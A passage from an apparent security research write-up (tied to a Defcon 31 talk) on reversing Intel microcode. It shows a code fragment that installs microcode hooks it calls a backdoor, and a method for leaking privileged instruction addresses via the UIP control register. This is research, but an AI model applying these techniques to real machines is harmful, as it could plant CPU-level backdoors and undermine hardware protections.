patch_ucode(addr, ucode_patch, ARRAY_SZ(ucode_patch));
hook_match_and_patch(0x12, hook_address, addr);
hook_match_and_patch(0x13, 0x02e4, addr+0x24);
}
We use 0x12 as our first match & patch register, as the ones below it are already allocated for actual bug fixes by Intel, and Chrome will nuke the CPU after a couple of seconds if we don’t keep these patches alive. We are still not sure of the root cause but have nailed it down to patch 0x8 being the critical one.
The entire code can be found in our repo, and demo in the presentation from Defcon 31.
Reversing Macro Instructions
Now with a backdoor in place, what’s left to do?
Well, we have seen Chrome crash due to bugs in the CPU. What if we could develop exploits for the CPU itself, and with what goal?
If we could somehow gain control of the uip, it might be possible to redirect microcode control flow to the debug instructions and, as such, do a red unlock from software.
As we have shown with syscall, we used the documentation as well as pseudocode from the Intel manual as a reference implementation while reversing. Another very neat trick is watching changes in the control register bus. As mentioned, the control register bus contains information shared between logic units.
In the control register bus, we find the two registers CORE_CR_CUR_RIP and CORE_CR_CUR_UIP at 0x67 and 0x68 respectively. An interesting observation about the UIP register is that it updates after executing the instruction. This fact can be abused to backtrace entire macro instructions.
Let’s say we want to find the xlat for swapgs. We can put a hook on generate_#GP and run MOVEFROMCREG_DSZ64_D(RAX, CORE_CR_CUR_UIP) as the first instruction after the hook. Now rax will contain the address executed before jumping to generate_#GP, which leaks the address of the last privileged macro instruction we executed from user-space. So if we run swapgs after placing this hook, we will leak its address. In labels.txt we have documented all the xlats we have found so far.